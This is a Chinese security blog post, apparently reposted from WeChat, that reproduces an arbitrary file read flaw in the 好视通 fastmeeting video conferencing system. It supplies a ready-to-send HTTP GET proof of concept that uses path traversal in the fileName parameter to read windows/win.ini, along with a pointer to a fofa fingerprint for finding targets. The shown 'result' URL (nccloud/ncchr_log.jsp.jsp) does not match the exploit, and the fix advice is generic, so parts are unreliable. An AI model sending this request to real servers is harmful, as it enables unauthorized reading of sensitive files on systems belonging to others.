漏洞复现|好视通视频会议存在任意文件读取漏洞 [附POC]

admin 2023年12月9日13:29:12评论42 views字数 918阅读3分3秒阅读模式

0x02

漏洞概述

Vulnerability Overview

某某通是国内云视频会议知名品牌,专注为教育、集团企业等用户提供“云+端+业务全场景”解决方案。

公司视频会议系统的文件(fastmeeting) /register/toDownload.do?fileName=存在任意文件遍历漏洞未经授权的攻击者通过漏洞可以通过fileName参数读取任意文件,获取服务器敏感信息

漏洞复现|某某通视频会议存在任意文件读取漏洞 [附POC]

(文章仅限技术交流,禁止非授权操作!)

0x03

漏洞复现

Vulnerability Recurrence

漏洞复现|某某通视频会议存在任意文件读取漏洞 [附POC]

fofa:详见下图空间指纹

1.参照如下POC语句并做执行

GET /register/toDownload.do?fileName=../../../**********../../windows/win.ini HTTP/1.1Host: {Hostname}:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0-------------------------------------------##其中Hostname为目标漏洞平台的实际地址或域名

2.发送数据包后效果如下:

 http://Hostname:port/nccloud/ncchr_log.jsp.jsp  -------------------------------------------##其中Hostname为目标漏洞平台的实际地址或域名

漏洞复现|某某通视频会议存在任意文件读取漏洞 [附POC]

(文章仅限技术交流,禁止非授权操作!)

0x04

漏洞脚本

Vulnerability script

1.空间指纹截图如下:

漏洞复现|某某通视频会议存在任意文件读取漏洞 [附POC]

0x05

修复建议

Repair Suggestions

1.实施产品的权限访问控制,降低互联网搜索引擎的查询。

2.加强后台认证要求(如AAAA策略等),提高口令的安全性。

3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。

原文始发于微信公众号(数字人才创研院):漏洞复现|某某通视频会议存在任意文件读取漏洞 [附POC]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月9日13:29:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现|好视通视频会议存在任意文件读取漏洞 [附POC]http://cn-sec.com/archives/2282657.html

发表评论

匿名网友 填写信息